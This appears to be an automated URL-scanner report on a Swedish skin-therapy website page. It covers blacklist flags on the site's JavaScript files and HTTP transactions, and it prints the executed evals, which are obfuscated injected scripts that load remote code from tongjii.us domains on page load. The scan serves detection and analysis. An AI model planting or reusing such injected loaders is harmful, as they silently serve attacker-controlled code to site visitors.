Overview

URL hudterapeuter.com/hudterapeuter/ansiktsmassage/
IP195.74.38.68
ASNAS41528 Binero AB
Location Sweden
Report completed2017-07-22 11:38:33 CEST
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2017-07-22 11:38:02 CEST 1 Client IP  180.149.138.197 ET POLICY External IP Lookup sina.com.cn


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-07-22 2 www.hudterapeuter.com/jquery/javascript.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery/bgpos.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery.fancybox/jquery.easing.1.3.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery.fancybox/jquery.fancybox-1.2.1.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery.js Malware
2017-07-22 2 lib.tongjii.us/tongji.js Malware
2017-07-22 2 cn.tongjii.us/show1.js?r2=22 Malware
2017-07-22 2 www.hudterapeuter.com/upl/small/5PV_logo.gif/ Malware
2017-07-22 2 www.hudterapeuter.com/upl/small/fasad1234.jpg/ Malware
2017-07-22 2 www.hudterapeuter.com/upl/small/5PV_logo.gif/ Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 195.74.38.68

Date UQ / IDS / BL URL IP
2019-04-30 09:05:10 +0200
0 - 0 - 0 espanet2019.se 195.74.38.68
2019-02-19 05:39:33 +0100
0 - 0 - 2 https://www.northmaint.se/ 195.74.38.68
2018-12-27 15:10:08 +0100
0 - 0 - 1 whoisip.se/robots.txt 195.74.38.68
2018-11-25 21:10:19 +0100
0 - 0 - 1 medfors.com/dd 195.74.38.68
2018-11-06 14:05:16 +0100
2 - 0 - 2 whoisip.se 195.74.38.68
2018-11-06 13:56:12 +0100
2 - 0 - 2 whoisip.se 195.74.38.68
2018-11-06 13:55:20 +0100
2 - 0 - 2 whoisip.se 195.74.38.68
2018-01-19 15:07:50 +0100
2 - 0 - 2 www.whoisip.se/ 195.74.38.68
2018-01-04 13:28:36 +0100
2 - 0 - 1 www.whoisip.se/ 195.74.38.68
2017-12-19 12:16:09 +0100
2 - 0 - 1 www.klockan.info/ 195.74.38.68

Last 10 reports on ASN: AS41528 Binero AB

Date UQ / IDS / BL URL IP
2019-06-27 09:11:33 +0200
0 - 0 - 0 www.tigercolor.com 195.74.38.98
2019-06-10 18:16:55 +0200
0 - 0 - 2 arnfast-kio-konsult.se/components/dhl.html 195.74.38.186
2019-06-10 15:33:46 +0200
0 - 0 - 1 kustkrogenolofsbo.se/wordpress/wp-content/plu (...) 195.74.38.121
2019-06-10 10:31:44 +0200
0 - 0 - 1 fifajournal.com/D1o40Dmemk 195.74.38.98
2019-06-10 07:08:17 +0200
0 - 0 - 1 solberga.org/tmp/install_4ee8d8cc51b82/media/ (...) 195.74.38.62
2019-06-10 07:06:02 +0200
0 - 0 - 1 solberga.org/tmp/install_4ee8d8cc51b82/media/ (...) 195.74.38.62
2019-06-09 13:34:54 +0200
0 - 0 - 30 ois.jenszackrisson.se/ 195.74.38.176
2019-06-09 11:22:58 +0200
0 - 0 - 2 ostbergsmobelhus.com/wp-content/language 195.74.38.160
2019-06-09 11:16:26 +0200
0 - 0 - 1 https://www.ostbergsmobelhus.com/wp-content/l (...) 195.74.38.160
2019-06-09 09:09:41 +0200
0 - 0 - 2 svenskrisimport.com/index.php/riskakor 195.74.38.171

Last 1 reports on domain: .

Date UQ / IDS / BL URL IP
2017-06-30 17:13:37 +0200
0 - 1 - 2 hudterapeuter.com/malmo/vaxning 195.74.38.68


JavaScript

Executed Scripts (24)


Executed Evals (5)

#1 JavaScript::Eval (size: 588, repeated: 3) - SHA256: e131aa02b31d0b9e695259eeb2ab07bacead75544f5b5abd8886a84155a09441

                                        eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return c.toString(36)
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[c.toString(a)] = k[c] || c.toString(a)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('1 4=4||[];(b(){1 2=5.e(\'7\');2.a=\'8://9.d.f/k.6?//i.6?g\';1 3=5.j(\'7\')[0];3.h.c(2,3)})();', 21, 21, '|var|hm_en|s|_hmt_en|document|js|script|http|lib|src|function|insertBefore|tongjii|createElement|us|41d12a21b4e1a726d4a651685b118811662033874|parentNode|google|getElementsByTagName|tj'.split('|'), 0, {}))
                                    

#2 JavaScript::Eval (size: 996, repeated: 3) - SHA256: 00f7a0523e0b4239298a8f783fe9cf82af9fd8ecef28a73b423edae9140739f6

                                        eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\'\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\'\\\\w+\'};c=1};r(c--){q(k[c]){p=p.t(C D(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}m p}(\'1 4=4||[];(b(){1 2=5.e(\\\'7\\\');2.a=\\\'8://9.d.f/k.6?//i.6?g\\\';1 3=5.j(\\\'7\\\')[0];3.h.c(2,3)})();\',o,o,\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\'.J(\'|\'),0,{}))', 55, 55, '|||||||||||||||||||||function|return|toString|21||if|while||replace|hm_en|eval||document|var|36|js|String|new|RegExp|_hmt_en|parentNode|script|google|getElementsByTagName|split|tj|us|41d12a21b4e1a726d4a651685b118811662033874|lib|createElement|src|http|insertBefore|tongjii'.split('|'), 0, {}))
                                    

#3 JavaScript::Eval (size: 1377, repeated: 3) - SHA256: 2616199a56bdbaae4dc5e778d3a306cd6b7b415c02024e067265dc20257b1ac3

                                        eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('7(x(e)=="A"||e==k||e==K){e=L;9 b=3.N(\'v\');7(b!=k&&b.c!=k){b.c=\'\';3.d.M(b)}9 z=Q.R.T();9 y=/W 6/.Y(z);7(!y){Z={$11:\'v\'};$J={};9 2=3.g(\'h\');2.c=\'i://O.P.12/2/w/1.8/w.U.2\';2.m(\'n\',\'f-8\');7(x B==\'A\'){(3.q("u")[0]||3.d).s(2);2.t=2.r=p(){7(2&&2.5&&2.5!="j"&&2.5!="o"){l}B.S();9 a=3.g(\'h\');a.c=\'i://I.C.D/E.2?X=\'+F G().H();a.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(a);a.t=a.r=p(){7(a&&a.5&&a.5!="j"&&a.5!="o"){l}}}}10{9 4=3.g(\'h\');4.c=\'i://I.C.D/E.2?V=\'+F G().H();4.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(4);4.t=4.r=p(){7(4&&4.5&&4.5!="j"&&4.5!="o"){l}}}}}', 62, 65, '||js|document|js_b|readyState||if||var||seed|src|body|sbj_new_loading|utf|createElement|script|http|loaded|null|return|setAttribute|charset|complete|function|getElementsByTagName|onreadystatechange|appendChild|onload|head|tongjiTool|jquery|typeof|isIE6|_ua|undefined|jQuery|tongjii|us|show1|new|Date|getDate|cn|_GLOBAL|false|true|removeChild|getElementById|lib|sinaapp|navigator|userAgent|noConflict|toLowerCase|min|r2|msie|r1|test|scope|else|pageid|com'.split('|'), 0, {}))
                                    

#4 JavaScript::Eval (size: 1434, repeated: 3) - SHA256: 5c3ec5fa684c7b643270645fc63e13323804eec6f86378f40d1de02a892ac6bd

                                        if (typeof(sbj_new_loading) == "undefined" || sbj_new_loading == null || sbj_new_loading == false) {
    sbj_new_loading = true;
    var seed = document.getElementById('tongjiTool');
    if (seed != null && seed.src != null) {
        seed.src = '';
        document.body.removeChild(seed)
    }
    var _ua = navigator.userAgent.toLowerCase();
    var isIE6 = /msie 6/.test(_ua);
    if (!isIE6) {
        scope = {
            $pageid: 'tongjiTool'
        };
        $_GLOBAL = {};
        var js = document.createElement('script');
        js.src = 'http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js';
        js.setAttribute('charset', 'utf-8');
        if (typeof jQuery == 'undefined') {
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js);
            js.onload = js.onreadystatechange = function() {
                if (js && js.readyState && js.readyState != "loaded" && js.readyState != "complete") {
                    return
                }
                jQuery.noConflict();
                var a = document.createElement('script');
                a.src = 'http://cn.tongjii.us/show1.js?r1=' + new Date().getDate();
                a.setAttribute('charset', 'utf-8');
                (document.getElementsByTagName("head")[0] || document.body).appendChild(a);
                a.onload = a.onreadystatechange = function() {
                    if (a && a.readyState && a.readyState != "loaded" && a.readyState != "complete") {
                        return
                    }
                }
            }
        } else {
            var js_b = document.createElement('script');
            js_b.src = 'http://cn.tongjii.us/show1.js?r2=' + new Date().getDate();
            js_b.setAttribute('charset', 'utf-8');
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js_b);
            js_b.onload = js_b.onreadystatechange = function() {
                if (js_b && js_b.readyState && js_b.readyState != "loaded" && js_b.readyState != "complete") {
                    return
                }
            }
        }
    }
}
                                    

#5 JavaScript::Eval (size: 261, repeated: 3) - SHA256: c3c91594491914f1aa57cb7a7342d87694cd45319576b7de0074b22ab82ab51e

                                        var _hmt_en = _hmt_en || [];
(function() {
    var hm_en = document.createElement('script');
    hm_en.src = 'http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(hm_en, s)
})();
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 222, repeated: 2) - SHA256: 50d23449657707d3106fd7fc1055ef0df5ec72801ee5ad399f484a1f2ef5df55

                                        < a href = "http://clk.tradedoubler.com/click?p=70363&a=1978982&g=17342348&pools=450314"
target = "_blank" > < img border = "0"
src = "http://www.gymgrossisten.com/bilder/gymgrossisten/TD/bs_140x350.gif"
title = "Bodystore&#46;com" > < /a>
                                    

#2 JavaScript::Write (size: 84, repeated: 1) - SHA256: 071bb71cc5f59a8a7b8eeb83d3b40bdfebdb2381c15bfb06526d6bc7b795dd25

                                        < script src = 'http://www.google-analytics.com/ga.js'
type = 'text/javascript' > < /script>
                                    

#3 JavaScript::Write (size: 141, repeated: 1) - SHA256: 5904229be827c99db72258f5b93a5c489e9a2b6dba350c655559f25f91237783

                                        < script type = "text/javascript"
src = "http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)010162219"
charset = "ISO-8859-1" > < /script>
                                    

#4 JavaScript::Write (size: 141, repeated: 1) - SHA256: aef3b3fc432214cb2c8223b7ea7698405beaa586162e20a59c47cbe4514856ac

                                        < script type = "text/javascript"
src = "http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)695183832"
charset = "ISO-8859-1" > < /script>
                                    


HTTP Transactions (35)


Request Response
                                        
                                            GET /jquery/javascript.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad287-18e-4fe4f0b4e5c47"
Accept-Ranges: bytes
Content-Length: 398
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   398
Md5:    3890351dc9f882025e2c8b2fcb55fec0
Sha1:   042f761101a7c99ccef3b8157738e1814db3036e
Sha256: 2be006305b1138ecda96b612633cc2c372edf3dd6d25185e31d488f041ca7b39

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /jquery/bgpos.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad286-4c2-4fe4f0b4d2b6c"
Accept-Ranges: bytes
Content-Length: 1218
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   1218
Md5:    c8df8821a7e0302ae8c9422365eb4237
Sha1:   a6c0364e106bc703aa42dce62cb2b5a7e323058f
Sha256: b7daed3cbf5bdeb9843317c797cbad5abfed769e8c1052a9eff6f5e3fbef0e21

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:37:57 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:37:56 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /jquery.fancybox/jquery.easing.1.3.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e53-2583-5161df9062e81"
Accept-Ranges: bytes
Content-Length: 9603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   9603
Md5:    fb323c2a880c896cfb5ebb97201f56ef
Sha1:   087990c77361bf282a986ce36f4b7e5cedf60223
Sha256: 2a8d2ecc528fd17f0650116705a34f66748859ab7c4ed407b759371f3dcd7bb5

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /styles.css HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:35 GMT
Etag: "4787354-296b-4fe4f032747eb"
Accept-Ranges: bytes
Content-Length: 10603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode C program text
Size:   10603
Md5:    5ded803ca90a08123c1ced2866e86ee2
Sha1:   74dcb7b85a5188b84ca70884ebb4b7eddfbdcce5
Sha256: 8a48bad8902f11fc9968003334f639b75dceba9ddd5447cc5dd619e8d279fc96
                                        
                                            GET /jquery.fancybox/jquery.fancybox.css HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:37 GMT
Etag: "44b8e56-12e0-4fe4f03415410"
Accept-Ranges: bytes
Content-Length: 4832
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   4832
Md5:    b140fcaab5aec61d0b382e1d05c663fd
Sha1:   43d0633e7e0c8f65b24d12af188990d1303a8047
Sha256: da2eb39547d9b060599f8f20430c9e27fa1150dea042c0008fd96ac3854cc8be
                                        
                                            GET /jquery.fancybox/jquery.fancybox-1.2.1.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e54-3fc0-5161df90645e3"
Accept-Ranges: bytes
Content-Length: 16320
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   16320
Md5:    b77b3d074cbe4048495a2ad91b939fea
Sha1:   eca6c7751f7d375a31ce4a5ef9f69a19e1eb197b
Sha256: 564ee795773003273c505f0eed7183ab4ddad4c54cd930770cf8b19c8bfab126

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /img/logo_s.png HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:49 GMT
Etag: "457431b-32b0-4fe4f0b1fe58b"
Accept-Ranges: bytes
Content-Length: 12976
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  PNG image, 348 x 51, 8-bit/color RGBA, non-interlaced
Size:   12976
Md5:    e3f2b0d54c05a86e5162bc20acd1c509
Sha1:   b0c8108c2722d71a903b0a5a7fe6c9cfbee26300
Sha256: 2967aa5eddebb376c9b1fc35c81efbd3647ef6e227fcbe4aed1a8b77d63dea56
                                        
                                            GET /jquery.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "42f1bba-ddcc-5161df9070d0d"
Accept-Ranges: bytes
Content-Length: 56780
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   56780
Md5:    1744208268fa90854b7caf3ff2f97283
Sha1:   bdf1fb9d5e59fce38344d8583eb4854ed4944710
Sha256: 56fa09c4c7f114de833fc930b5e58872f24f0812cb68bed093ade296ea78a19e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         103.230.122.162
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:35:42 GMT
Content-Length: 584
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Connection: keep-alive
Etag: "596f39f9-248"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   584
Md5:    e3234a0a314ab9037281a61532d9f385
Sha1:   da19d2b503932bfb7b0ccf6c40b9f0b0d19282fb
Sha256: 59ec2b49759dd09f18e6a99dd9424f56223bef43b624f37979e02bd21c976722
                                        
                                            GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:37:58 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:37:58 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /tongji.js HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         103.230.122.162
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:35:43 GMT
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"596f39f9-803"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1145
Md5:    c4ad0d579602dfcb81e42018f2f7ca90
Sha1:   c778b8ce60d843fcaa8b943681af9cb28f87c53e
Sha256: 481eff6a5f51981e6f947ae316365d1d542478843d353f7afcbbbfff675e3a24

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /hudterapeuter/ansiktsmassage/ HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=i7he46289d4vqbh5641kkudgl5; path=/
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text, with very long lines, with CRLF, LF line terminators
Size:   45877
Md5:    3d98a20c2327bed3eec27f6c517d3cc4
Sha1:   ddc63f3021c715b3d8ee9b0cafb12bb824f0ecf8
Sha256: 08f93194b9aa104785516f09bd93a436868b10018dd2f5aac4357237141f4aed
                                        
                                            GET /show1.js?r2=22 HTTP/1.1 
Host: cn.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:37:59 GMT
Last-Modified: Tue, 04 Jul 2017 01:02:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"595ae924-3bee"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4331
